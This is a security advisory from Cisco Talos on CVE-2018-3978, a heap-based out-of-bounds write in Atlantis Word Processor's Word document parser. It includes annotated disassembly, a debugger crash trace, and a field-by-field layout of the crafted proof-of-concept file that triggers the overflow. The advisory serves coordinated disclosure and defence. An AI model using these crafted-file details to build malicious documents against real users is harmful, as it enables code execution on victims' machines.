Talos Vulnerability Report

TALOS-2018-0646

Atlantis Word Processor Word Document Complex Piece Descriptor Table Fc.Compressed Code Execution Vulnerability

October 1, 2018
CVE Number

CVE-2018-3978

Summary

An exploitable out-of-bounds write vulnerability exists in the Word Document parser of the Atlantis Word Processor. A specially crafted document can cause Atlantis to write a value outside the bounds of a heap allocation, resulting in a buffer overflow. An attacker must convince a victim to open a document in order to trigger this vulnerability.

Tested Versions

Atlantis Word Processor 3.0.2.3, 3.0.2.5

Product URLs

https://www.atlantiswordprocessor.com/en/

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-122: Heap-based Buffer Overflow

Details

Atlantis’ Word Processor is a traditional word processor that markets itself as being portable and feature-heavy. This word processor is ideally suited for writers and students and provides a number of useful features that can help simplify, and even improve, one’s writing. Atlantis Word Processor is fully compatible with other word processors such as Microsoft Word 2007. Atlantis also has the capability to encrypt document files and to fully customize the interface. This application is written in Delphi and contains the majority of its capabilities within a single relocatable binary.

When Atlantis tries to parse a Microsoft Word binary document, the application will first fingerprint it to determine the correct file format. Once discovering that the file is a compound document file, it will locate the “WordDocument” stream, check the stream’s signature, and then read the Fib out of its header. After storing a couple of fields out of the Fib, the application will then use a field from the Fib to determine which stream contains table information which can be “1Table” or “0Table”. Once it has identified the correct table stream, the application will then read an offset to the Clx array and its size out of the Fib and use this to locate the Clx array. When parsing this array, the application will check if the elements in the array are pointing to compressed pieces/text. If an individual piece is compressed, the application will re-calculate the character position and write it back into the array. If the CLX array size (as stored in the Fib) is smaller than a multiple of the size of each individual element, this new character position will be written outside the bounds of the array, leading to a heap-based buffer overflow.

When first loading a document, the application will call the following function. This function takes a TDoc and the file format type as an index and is responsible for fingerprinting the file and then parsing it. First, at [1], the application will call the function 0x5ab474, which will read a filename from the function’s frame and then write a file handle into the TDoc variable at %ebp-18. After the handle is allocated, the application will read the file into a buffer and then call the function at 0x5ad9aa to verify that the file matches the type that was specified. Once this has been verified to be a Word document (DOC), the application will then call the function at [2] in order to parse the file.

awp+0x1ad81d:
005ad81d 55              push    ebp
005ad81e e851dcffff      call    awp+0x1ab474 (005ab474)    // [1] Open up the file, and return the handle.
005ad823 59              pop     ecx
005ad824 84c0            test    al,al
005ad826 750d            jne     awp+0x1ad835 (005ad835)
...
awp+0x1ad8f2:
005ad8f2 55              push    ebp
005ad8f3 680fd95a00      push    offset awp+0x1ad90f (005ad90f)
005ad8f8 64ff30          push    dword ptr fs:[eax]
005ad8fb 648920          mov     dword ptr fs:[eax],esp
005ad8fe 55              push    ebp
005ad8ff e8d82cfdff      call    awp+0x1805dc (005805dc)    // Reads the file into a local buffer
005ad904 59              pop     ecx
...
awp+0x1ad9a4:
005ad9a4 55              push    ebp
005ad9a5 8b45f0          mov     eax,dword ptr [ebp-10h]    // Pointer to File Format Type index
005ad9a8 8bc3            mov     eax,ebx
005ad9aa e86d3afdff      call    awp+0x18141c (0058141c)    // Verify the file matches the format specified by %eax
005ad9af 59              pop     ecx
005ad9b0 84c0            test    al,al
005ad9b2 0f8592000000    jne     awp+0x1ada4a (005ada4a)
...
awp+0x1ade4d:
005ade4d 8b45e8          mov     eax,dword ptr [ebp-18h]                    // TDoc
005ade50 8b80dc000000    mov     eax,dword ptr [eax+0DCh]
005ade56 83f805          cmp     eax,5
005ade59 776a            ja      awp+0x1adec5 (005adec5)
005ade5b ff248562de5a00  jmp     dword ptr awp+0x1ade62 (005ade62)[eax*4]   // Jump to the correct file format parser
005ade62 7ade            jp      awp+0x1ade42 (005ade42)
...
awp+0x1ade89:
005ade89 55              push    ebp
005ade8a e8259dfeff      call    awp+0x197bb4 (00597bb4)                    // [2] Parse the .doc file
005ade8f 59              pop     ecx
005ade90 8885d7f8ffff    mov     byte ptr [ebp-729h],al
005ade96 eb3a            jmp     awp+0x1aded2 (005aded2)

To parse a DOC file, the application will execute the following function. This will first perform a number of things to figure out how to handle the file. First, the application will check the beginning of the “WordDocument” stream for a 16-bit signature 0xa5ec. Once that is determined, Atlantis can then read from the Fib in the “WordDocument” stream’s header to locate which stream contains table data [3]. If this bit is set (1), then the table can be located in the “1Table” stream. If it is cleared (0), then the table will be located in the “0Table” stream. The correct stream is then opened by the call at [4] or [5]. Finally, the last stream that this function will open is the “Data” stream. This stream is opened at [6].

awp+0x197d0f:
00597d0f 0fb707          movzx   eax,word ptr [edi]
00597d12 3deca50000      cmp     eax,0A5ECh             // Check first word at begining of WordDocument stream for signature
00597d17 0f9445f7        sete    byte ptr [ebp-9]
...
awp+0x197d4d:
00597d4d f6470b02        test    byte ptr [edi+0Bh],2   // [3] Check FibBase.b.fWhichTblStm to determine whether to use the "0Table" or "1Table" stream
00597d51 7531            jne     awp+0x197d84 (00597d84)
...
awp+0x197d53:
00597d53 8d45fc          lea     eax,[ebp-4]
00597d56 e819c7e6ff      call    awp+0x4474 (00404474)
00597d5b 50              push    eax
00597d5c 6a00            push    0
00597d5e 6a10            push    10h
00597d60 6a00            push    0
00597d62 a1080e6700      mov     eax,dword ptr [awp+0x270e08 (00670e08)]    // Reference to string "0Table"
00597d67 8b00            mov     eax,dword ptr [eax]
00597d69 50              push    eax
00597d6a 8b4508          mov     eax,dword ptr [ebp+8]
00597d6d 8b806cffffff    mov     eax,dword ptr [eax-94h]
00597d73 50              push    eax
00597d74 8b00            mov     eax,dword ptr [eax]
00597d76 ff5010          call    dword ptr [eax+10h]                        // [4] Uses IStorage->OpenStream to open the "0Table" stream
00597d79 85c0            test    eax,eax
00597d7b 7d36            jge     awp+0x197db3 (00597db3)
...
awp+0x197d84:
00597d84 8d45fc          lea     eax,[ebp-4]
00597d87 e8e8c6e6ff      call    awp+0x4474 (00404474)
00597d8c 50              push    eax
00597d8d 6a00            push    0
00597d8f 6a10            push    10h
00597d91 6a00            push    0
00597d93 a1a00b6700      mov     eax,dword ptr [awp+0x270ba0 (00670ba0)]    // Reference to string "1Table"
00597d98 8b00            mov     eax,dword ptr [eax]
00597d9a 50              push    eax
00597d9b 8b4508          mov     eax,dword ptr [ebp+8]
00597d9e 8b806cffffff    mov     eax,dword ptr [eax-94h]
00597da4 50              push    eax
00597da5 8b00            mov     eax,dword ptr [eax]
00597da7 ff5010          call    dword ptr [eax+10h]                        // [5] Uses IStorage->OpenStream to open the "1Table" stream
00597daa 85c0            test    eax,eax
00597dac 7d05            jge     awp+0x197db3 (00597db3)
...
awp+0x197db3:
00597db3 8d45f8          lea     eax,[ebp-8]
00597db6 e8b9c6e6ff      call    awp+0x4474 (00404474)
00597dbb 50              push    eax
00597dbc 6a00            push    0
00597dbe 6a10            push    10h
00597dc0 6a00            push    0
00597dc2 a174106700      mov     eax,dword ptr [awp+0x271074 (00671074)]    // Reference to string "Data"
00597dc7 8b00            mov     eax,dword ptr [eax]
00597dc9 50              push    eax
00597dca 8b4508          mov     eax,dword ptr [ebp+8]
00597dcd 8b806cffffff    mov     eax,dword ptr [eax-94h]
00597dd3 50              push    eax
00597dd4 8b00            mov     eax,dword ptr [eax]
00597dd6 ff5010          call    dword ptr [eax+10h]                        // [6] Uses IStorage->OpenStream to open the "Data" stream
00597dd9 eb22            jmp     awp+0x197dfd (00597dfd)

After opening up the required streams, Atlantis will begin to parse the required data out of them. At [6], the application will begin to parse various records such as the document properties table, PlcfBkl table (Bookmarks), etc. After parsing this, the application will take the sum of the various CCP fields that are listed. These fields are needed by parsers of the Word document to determine the location of the different sections of a document. Eventually, the application will execute the instruction at [7] and continue parsing more of the file format.

awp+0x197dfd:
00597dfd 55              push    ebp
00597dfe e83549ffff      call    awp+0x18c738 (0058c738)    // [6] Parse the Dop fields out of the table stream
00597e03 59              pop     ecx
...
// Various functions that read an FcLcb from the Fib structure of the WordDocument and reads them into a TMemory object
...
awp+0x197fbc:
00597fbc 55              push    ebp
00597fbd 8b574c          mov     edx,dword ptr [edi+4Ch]    // ccpText
00597fc0 035750          add     edx,dword ptr [edi+50h]    // ccpFtn
00597fc3 035754          add     edx,dword ptr [edi+54h]    // ccpHdd
00597fc6 035760          add     edx,dword ptr [edi+60h]    // ccpEdn
00597fc9 8b4734          mov     eax,dword ptr [edi+34h]
00597fcc 034738          add     eax,dword ptr [edi+38h]
00597fcf 03473c          add     eax,dword ptr [edi+3Ch]
00597fd2 034748          add     eax,dword ptr [edi+48h]
00597fd5 e84e47ffff      call    awp+0x18c728 (0058c728)    // Returns %edx depending on 0xa5ec signature or %eax otherwise
00597fda 59              pop     ecx
...
awp+0x198001:
00598001 55              push    ebp
00598002 e80df1ffff      call    awp+0x197114 (00597114)    // [7] Continue parsing the document

Once inside the following function (0x597114), Atlantis will store some of the individual CCP fields that were summed up earlier. These fields will be used to collect the different sections belonging to the document. After they are collected, they are used to process a number of different fields within the Fib. Eventually, the application will get to the instruction at [8]. These instructions will use the FcLcb structure belonging to the CLX field in the Fib to locate the CLX array in the table stream. At [9], the lcb field containing the size of the “Clx” array will be used in an allocation. This allocation will be the heap buffer that will be overflown later. Immediately afterward at [10] the application will read the CLX array into the buffer.

awp+0x197114:
00597114 55              push    ebp
00597115 8bec            mov     ebp,esp
00597117 50              push    eax
00597118 b806000000      mov     eax,6
0059711d 81c404f0ffff    add     esp,0FFFFF004h
...
// Store the individual sections of the document
...
// Process the different sections of the document.
...
awp+0x197623:
00597623 8b4508          mov     eax,dword ptr [ebp+8]      // [8]
00597626 50              push    eax
00597627 8b4508          mov     eax,dword ptr [ebp+8]
0059762a 8b4008          mov     eax,dword ptr [eax+8]
0059762d 8b900efbffff    mov     edx,dword ptr [eax-4F2h]   // Read the fib.fibRgFcLcbBlob.97.Clx.lcb field
00597633 8b4508          mov     eax,dword ptr [ebp+8]
00597636 8b4008          mov     eax,dword ptr [eax+8]
00597639 8b80ccfaffff    mov     eax,dword ptr [eax-534h]
0059763f e8e450ffff      call    awp+0x18c728 (0058c728)    // Returns %edx depending on 0xa5ec signature or %eax otherwise
00597644 59              pop     ecx
00597645 8985cc90ffff    mov     dword ptr [ebp-6F34h],eax  // Stores the size of the Clx table
0059764b 8b4508          mov     eax,dword ptr [ebp+8]
0059764e 50              push    eax
0059764f 8b4508          mov     eax,dword ptr [ebp+8]
00597652 50              push    eax
00597653 8b4508          mov     eax,dword ptr [ebp+8]
00597656 8b4008          mov     eax,dword ptr [eax+8]
00597659 8b900afbffff    mov     edx,dword ptr [eax-4F6h]   // Read the fib.fibRgFcLcbBlob.97.Clx.fc field
0059765f 8b4508          mov     eax,dword ptr [ebp+8]
00597662 8b4008          mov     eax,dword ptr [eax+8]
00597665 8b80c8faffff    mov     eax,dword ptr [eax-538h]
0059766b e8b850ffff      call    awp+0x18c728 (0058c728)    // Returns %edx depending on 0xa5ec signature or %eax otherwise
00597670 59              pop     ecx
00597671 e8a24fffff      call    awp+0x18c618 (0058c618)    // Seek to the offset specified by fib.fibRgFcLcbBlob.97.Clx.fc
00597676 59              pop     ecx
00597677 8b85cc90ffff    mov     eax,dword ptr [ebp-6F34h]  // Size of the Clx array
0059767d e8beace6ff      call    awp+0x2340 (00402340)      // [9] Use size to allocate memory
00597682 8985c890ffff    mov     dword ptr [ebp-6F38h],eax  // Pointer that will contain Clx array
00597688 8b4508          mov     eax,dword ptr [ebp+8]
0059768b 50              push    eax
0059768c 8b95cc90ffff    mov     edx,dword ptr [ebp-6F34h]  // Size
00597692 8b85c890ffff    mov     eax,dword ptr [ebp-6F38h]  // Pointer containing Clx array
00597698 e8af4fffff      call    awp+0x18c64c (0058c64c)    // [10] Read Clx array from the Table stream

After reading the CLX array, Atlantis will begin to parse it. To parse this array, the application will read the first byte and check to see if it is a 0x01 or a 0x02. If it’s a 0x01, it will process the array as an RgPrc array. If it’s 0x02, it will process it as a pcdt or a “piece descriptor” array. The vulnerability described in this advisory is related to how the application processes the piece descriptor array. Once determining that the CLX is pointing to a piece descriptor array, the application will pre-calculate some pointers into the data that need to be parsed. This will then be processed by a loop that will iterate for each element in the array.

awp+0x1976e5:
005976e5 8bbdc890ffff    mov     edi,dword ptr [ebp-6F38h]      // Clx array data from file
005976eb 03f9            add     edi,ecx
005976ed 47              inc     edi                            // %edi points to Clx.pcdt.clxt field
005976ee 8b07            mov     eax,dword ptr [edi]            // Read the lcb field at the beginning of the Clx.pcdt structure
005976f0 83e804          sub     eax,4                          // Remove the size of the Clx.pcdt.lcb field
005976f3 51              push    ecx
005976f4 b90c000000      mov     ecx,0Ch                        // sizeof(CP) + sizeof(PLC)
005976f9 99              cdq
005976fa f7f9            idiv    eax,ecx
005976fc 59              pop     ecx
005976fd 83c704          add     edi,4
00597700 89bdc490ffff    mov     dword ptr [ebp-6F3Ch],edi
00597706 8d5001          lea     edx,[eax+1]                    // Number of elements in the Clx.pcdt.PlcPcd.aCP array
00597709 c1e202          shl     edx,2
0059770c 0395c490ffff    add     edx,dword ptr [ebp-6F3Ch]      // Clx.Pcdt.PlcPcd file offset used to calculate pointer to Clx.pcdt.PlcPcd.aPcd
00597712 8995c090ffff    mov     dword ptr [ebp-6F40h],edx      // Write the pointer to Clx.pcdt.PlcPcd.aPcd for use later
00597718 48              dec     eax
00597719 85c0            test    eax,eax
0059771b 0f8ca8010000    jl      awp+0x1978c9 (005978c9)
...
awp+0x197721:
00597721 40              inc     eax
00597722 89859c90ffff    mov     dword ptr [ebp-6F64h],eax      // aCP counter used to terminate following loop
00597728 c785b890ffff00000000 mov dword ptr [ebp-6F48h],0       // aCP index used to maintain position in following loop

After determining how to parse the piece descriptor table, the application will execute the following loop. Each iteration of this loop will read each piece descriptor and determine whether the piece is described as compressed or not. This result will eventually be handed off to the function call at [11]. However, due to the way the application handles a compressed piece, the application may corrupt the memory that was allocated for the Clx array. At [12], the application will check to see if the Pcd.fCompressed field is set. If this field is set, then execution will continue at [13]. At this point the application will extract the Fc offset from the piece descriptor, divide it by two, and then write it back into the array at [14]. Due to the application using the Clx.Lcb field from the Fib to allocate this array and initialize it, the application may corrupt data during the last iteration after the array with the instruction at [14]. At [15], the pointer will then be freed. Due to the way the Delphi heap allocator works, this will result in an “unlink” that can be used to further corrupt memory.

awp+0x197732:
00597732 8bbdb890ffff    mov     edi,dword ptr [ebp-6F48h]      // Read current aCP index
00597738 c1e703          shl     edi,3
0059773b 03bdc090ffff    add     edi,dword ptr [ebp-6F40h]      // Add it to Clx.pcdt.PlcPcd.aPcd pointer
00597741 8b4702          mov     eax,dword ptr [edi+2]          // Read the Pcd.fc field out of the Clx.pcdt.PlcPcd.aPcd index
00597744 a900000040      test    eax,40000000h                  // [12] Check to see if the Pcd.fCompressed field is set
00597749 7413            je      awp+0x19775e (0059775e)
0059774b 25ffffffbf      and     eax,0BFFFFFFFh                 // [13] Extract the Pcd.fc offset from the Pcd
00597750 d1e8            shr     eax,1                          // Divide the offset by 2
00597752 894702          mov     dword ptr [edi+2],eax          // [14] Write the offset back into the array
00597755 c685bf90ffff01  mov     byte ptr [ebp-6F41h],1         // Set a flag specifying that the piece is compressed
0059775c eb19            jmp     awp+0x197777 (00597777)
...
awp+0x197889:
00597899 8b85b090ffff    mov     eax,dword ptr [ebp-6F50h]      // aCP end
0059789f 2b85b490ffff    sub     eax,dword ptr [ebp-6F4Ch]      // aCP start
005978a5 0fafc8          imul    ecx,eax                        // %ecx = 1 if fc.fCompressed is false (ascii), 2 if fc.fCompressed is true (unicode)
005978a8 8b5702          mov     edx,dword ptr [edi+2]          // Points to Clx.Pcdt.PlcPcd.aPcd
005978ab 8b85b490ffff    mov     eax,dword ptr [ebp-6F4Ch]      // aCP start
005978b1 e89ee4ffff      call    awp+0x195d54 (00595d54)        // [11] Parse piece using descriptor
005978b6 59              pop     ecx
005978b7 ff85b890ffff    inc     dword ptr [ebp-6F48h]          // aCP index
005978bd ff8d9c90ffff    dec     dword ptr [ebp-6F64h]          // aCP counter
005978c3 0f8569feffff    jne     awp+0x197732 (00597732)
...
005978c9 8b85c890ffff    mov     eax,dword ptr [ebp-6F38h]      // Clx array that was corrupted
005978cf e8eca6e6ff      call    awp+0x1fc0 (00401fc0)          // [15] Free the Clx array that was allocated
005978d4 eb5e            jmp     awp+0x197934 (00597934)

In the provided proof-of-concept, the Fib.Clx field is set to the following values. Due to the lcb field being set to a size of 0x31, which is not a multiple of the size of a piece descriptor (8), the application will read a uint32 partially outside the end of the Clx array when entering the loop described in the prior code, divide it by two, and then write it back into the array. Due to this uint32 being outside of the CLX array, this will corrupt any memory that is positioned after it.

<class winword.FcLcb> 'Clx'
[1a2] <instance pint.uint32_t 'fc'> 0x00000772 (1906)
[1a6] <instance pint.uint32_t 'lcb'> 0x00000031 (49)

Crash Information

Execute until the CLX array gets allocated. The CLX array is allocated with 0x31 bytes.

0:006> g awp+19767d
eax=00000031 ebx=00000005 ecx=0018f004 edx=0dc60500 esi=0066e894 edi=00000488
eip=0059767d esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
awp+0x19767d:
0059767d e8beace6ff      call    awp+0x2340 (00402340)

0:000> r @eax
eax=00000031

The buffer allocated for the CLX array was returned in %eax.

0:000> p
eax=0b7f92f8 ebx=00000005 ecx=0b7f92f8 edx=0018ecd4 esi=0066e894 edi=00000488
eip=00597682 esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
awp+0x197682:
00597682 8985c890ffff    mov     dword ptr [ebp-6F38h],eax ss:002b:00187d90=00000000

0:000> r @eax
eax=0b7f92f8

0:000> r@$t1=@eax

Check each iteration of loop to identify the iteration that writes past the CLX array

0:000> bp awp+197752
0:000> g

Create thread 9:930
Breakpoint 0 hit
eax=00000800 ebx=00000005 ecx=00000000 edx=0b7f9311 esi=0066e894 edi=0b7f9311
eip=00597752 esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
awp+0x197752:
00597752 894702          mov     dword ptr [edi+2],eax ds:002b:0b7f9313=40001000

0:000> ? @edi-@$t1
Evaluate expression: 25 = 00000019
0:000> g

Breakpoint 0 hit
eax=00001800 ebx=00000005 ecx=0018ecc8 edx=00000000 esi=0066e894 edi=0b7f9321
eip=00597752 esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
awp+0x197752:
00597752 894702          mov     dword ptr [edi+2],eax ds:002b:0b7f9323=40003000

0:000> ? @edi-@$t1
Evaluate expression: 41 = 00000029
0:000> g

Breakpoint 0 hit
eax=13904805 ebx=00000005 ecx=0018ecc8 edx=00000000 esi=0066e894 edi=0b7f9329
eip=00597752 esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000207
awp+0x197752:
00597752 894702          mov     dword ptr [edi+2],eax ds:002b:0b7f932b=6720900b

0:000> ? @edi-@$t1
Evaluate expression: 49 = 00000031

Last iteration of loop has written out of bounds of the CLX array. Continue execution till it gets freed.

0:000> g awp+1978cf

eax=0b7f92f8 ebx=00000005 ecx=0018ecc8 edx=00000000 esi=0066e894 edi=0b7f9329
eip=005978cf esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
awp+0x1978cf:
005978cf e8eca6e6ff      call    awp+0x1fc0 (00401fc0)

Step over the free which uses the corrupted memory.

0:000> p

(bec.bf0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00139048 ebx=00001040 ecx=00001008 edx=0bb6449c esi=0b7f92f4 edi=0b7f932c
eip=00401a02 esp=00187d30 ebp=00187d50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
awp+0x1a02:
00401a02 895004          mov     dword ptr [eax+4],edx ds:002b:0013904c=????????

Exploit proof of concept

The provided proof of concept is encompassed within a Microsoft Word document that uses Microsoft’s Compound File Binary format. Documentation for this can be found at https://msdn.microsoft.com/en-us/library/dd942138.aspx and its respective file format at https://msdn.microsoft.com/en-us/library/office/cc313153(v=office.12).aspx.

A Microsoft Word compound document contains a number of streams. The ones that are utilized by this vulnerability are the “WordDocument” stream and the “Table” stream. The “WordDocument” stream contains the table of contents for the rest of the file using a structure referred to as the Fib or the “File Information Block”. The table stream can have one of two names. These are “0Table” and “1Table”. The specific stream name can be identified by a flag which is located in the Fib that is stored at the beginning of the “WordDocument” stream.

In the “WordDocument” stream within the provided proof of concept, the Fib has the following structure. The application actually verifies that a file is valid by checking a couple of fields in the Fib.base structure despite this vulnerability only depending on a small number of fields. In this structure, the fields csw, cslw, and cbRgRcLcb contain the number of elements of the arrays that follow them. The fibRgW is composed of uint16_t, the fibRgL field is of uint32_t, and the fibRgFcLcbBlob is composed of uint64_t.

<class winword.Fib> 'fib'
[0] <instance winword.FibBase 'base'> "\xec\xa5\x31\xe8\x09\x40\x09\x04\x00\x00\xf8\x12\xbf\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06\x00\x00\x99\x2c\x00\x00"
[20] <instance pint.uint16_t 'csw'> 0x000e (14)
[22] <instance winword.FibRgW 'fibRgW'> pint.uint16_t[14] "\x62\x6a\x62\x6a\x7b\xce\x7b\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x0c"
[3e] <instance pint.uint16_t 'cslw'> 0x0016 (22)
[40] <instance winword.FibRgLw 'fibRgLw'> pint.uint32_t[22] "\x2e\x2e\x00\x00\x19\xa4\x00  ..skipped ~68 bytes.. \x00\x00\x00\x00\x00\x00\x00"
[98] <instance pint.uint16_t 'cbRgFcLcb'> 0x0088 (136)
[9a] <instance winword.FibRgFcLcb 'fibRgFcLcbBlob'> pint.uint64_t[136] "\x00\x00\x00\x00\xc4\x01\x00   ..skipped ~1068 bytes..  \x00\x00\x00\x00\x00\x00"
[4da] <instance pint.uint16_t 'cswNew'> 0x0002 (2)
[4dc] <instance pint.uint16_t 'nFibNew'> 0x0101 (257)
[4de] <instance winword.FibRgCswNew 'fibRgCswNew'> pint.uint16_t[1] "\x00\x00"

The Fib.base structure has the following format. Atlantis verifies that the wIdent field is set to 0xa5ec, and that the value for nFib is larger than 0x0065. The table stream is chosen by the Fib.base.b.fWhichTblStm (0x0200) flag. If this value is true, then “1Table” is chosen, otherwise “0Table” is chosen. The other fields that Atlantis requires is that Fib.base.b.fComplex (0x0004), Fib.base.b.fEncrypted (0x0100), and Fib.base.b.fObfuscated (0x8000) are cleared.

<class winword.FibBase> 'base'
[0] <instance pint.uint16_t 'wIdent'> 0xa5ec (42476)                                            // XXX
[2] <instance pint.uint16_t 'nFib'> 0xe831 (59441)                                              // XXX: Must be >= 0x0065
[4] <instance pint.uint16_t 'unused'> 0x4009 (16393)
[6] <instance winword.LID 'lid'> en-US(0x409)
[8] <instance pint.uint16_t 'pnNext'> 0x0000 (0)
[a] <instance winword._b 'b'> (0x12f8,16) : fExtChar fWhichTblStm cQuickSaves=15 fHasPic        // XXX
[c] <instance pint.uint16_t 'nFibBack'> 0x00bf (191)
[e] <instance pint.uint32_t 'lKey'> 0x00000000 (0)
[12] <instance pint.uint8_t 'envr'> 0x00 (0)
[13] <instance winword._b2 'b2'> (0x10,8) : reserved2
[14] <instance pint.uint16_t 'reserved3'> 0x0000 (0)
[16] <instance pint.uint16_t 'reserved4'> 0x0000 (0)
[18] <instance pint.uint32_t 'reserved5'> 0x00000600 (1536)
[1c] <instance pint.uint32_t 'reserved6'> 0x00002c99 (11417)

The following fields are inside the Fib.fibRgLw array. These fields are used by the piece descriptor table to determine when the aCP array terminates and the aPcd array begins. Normally, the ccpText field (index 3) can be used to determine the limits of the maximum value for aCP. However, if any of the ccpFtn (index 4), ccpHdr (index 5), ccpMcr (index 6), ccpAtn (index 7), ccpEdn (index 8), or ccpTxbx (index 9) fields are set. Then the maximum value for aCP is based on the sum of these numbers.

<class winword.FibRgLw95> '95'
[40] <instance pint.uint32_t 'cbMac'> 0x00002e2e (11822)
[44] <instance pint.uint32_t 'lProductCreated'> 0x0000a419 (42009)
[48] <instance pint.uint32_t 'lProductRevised'> 0x0000a419 (42009)
[4c] <instance pint.uint32_t 'ccpText'> 0x00001440 (5184)
[50] <instance pint.uint32_t 'ccpFtn'> 0x00000000 (0)
[54] <instance pint.uint32_t 'ccpHdr'> 0x00000000 (0)
[58] <instance pint.uint32_t 'ccpMcr'> 0x00000000 (0)
[5c] <instance pint.uint32_t 'ccpAtn'> 0x00000000 (0)
[60] <instance pint.uint32_t 'ccpEdn'> 0x00000000 (0)
[64] <instance pint.uint32_t 'ccpTxbx'> 0x00000000 (0)
[68] <instance pint.uint32_t 'ccpHdrTxbx'> 0x00000000 (0)

After Atlantis validates the fields in the header, the vulnerability consists of just the Clx field inside the fibRgFcLcbBlob within the file information block. Each field inside fibRgFcLcbBlob has the following format. This structure contains a field fc which represents an offset into a stream, and lcb which represents the number of bytes. The Clx field is at index 33 of the fibRgFcLcbBlob array. For an FcLcb structure, the fc field represents the offset into the table stream. Atlantis uses the Clx.lcb field to control the size of the allocation which is then used in the loop that can corrupt memory. The application can corrupt memory after the array when it attempts to write a compressed offset back into the allocated CLX array because the field is not a multiple of the size of a piece description [8].

<class winword.FcLcb> 'Clx'
[1a2] <instance pint.uint32_t 'fc'> 0x00000772 (1906)
[1a6] <instance pint.uint32_t 'lcb'> 0x00000031 (49)

Using the fc field from the FcLcb, the CLX array can be located inside the table stream. This array is prefixed with a byte, clxt, which determines what type of array will follow. Within the provided proof of concept, this value must be 0x02 in order for a piece descriptor table array to be contained.

<class winword.Clx> 'Table.Clx'
[772] <instance pint.uint8_t 'clxt'> 0x02 (2)
[773] <instance ptype.undefined 'RgPrc'> ...
[773] <instance winword.Pcdt 'Pcdt'> "\x34\x00\x00\x00\x00\x00\x00\x00\x00\x0c  ..skipped ~28 bytes..  \xa7\x13\x00\x00\x40\x14\x00\x00\x40\x00\x00\x10"

The piece descriptor table array is prefixed with a 32-bit length, which is used to describe the size of the PlcPcd array.

<class winword.Pcdt> 'Pcdt'
[773] <instance pint.uint32_t 'lcb'> 0x00000034 (52)
[777] <instance winword.PlcPcd 'PlcPcd'> "\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x0e  ..skipped ~24 bytes.. \x40\x14\x00\x00\x40\x00\x00\x10\x00\x40\x00\x00"

Inside the PlcPcd array are two fields. The aCP field represents the character position. This array is composed of uint32_t and loops until one of the values is larger than the CCP fields that were explained earlier. Once the array has terminated, the rest of the structure (as sized by the lcb field of the Pcdt structure) is composed of Pcd elements.

<class winword.PlcPcd> 'PlcPcd'
[777] <instance winword._aCP 'aCP'> winword.CP[5] "\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\xa7\x13\x00\x00\x40\x14\x00\x00"
[78b] <instance dynamic.blockarray(winword.Pcd,32) 'aPcd'> winword.Pcd[4] "\x40\x00\x00\x10\x00\x40\x00\x00\x40\x00\x00\x14\x00\x00\x00\x00\x40\x00\x00\x30\x00\x40\x00\x00\x00\x00\x00\x58\x00\x40\x00\x00"

Each Pcd structure has the following format and is eight bytes long. The first 16 bits represent general flags, followed by a uint32_t for the fc field, and then ended with a 16-bit value representing a Sprm. This vulnerability revolves around the fc field being compressed. A piece descriptor represents a compressed piece when the fCompressed flag (0x40000000) of the fc field is set. When this field is set, the offset (0x3fffffff) is divided by 2 and then written pasted the array corrupting any memory after the allocation. If the last element of the PlcPcd array is compressed by setting this flag, this vulnerability is likely being triggered.

<class winword.Pcd> '3'
[7a3] <instance winword._b 'b'> (0x0000,16)
[7a5] <instance winword.FcCompressed 'fc'> (0x40005800,32) : r1=(0x0,1) fCompressed=(0x1,1) fc=(0x00005800,30) : offset -> 0x2c00
[7a9] <instance winword.Prm 'prm'> "\x00\x00"

Timeline

2018-09-10 - Vendor Disclosure
2018-09-11 - Vendor patched via beta version
2018-09-26 - Vendor released
2018-10-01 - Public Disclosure

Credit

Discovered by a member of Cisco Talos.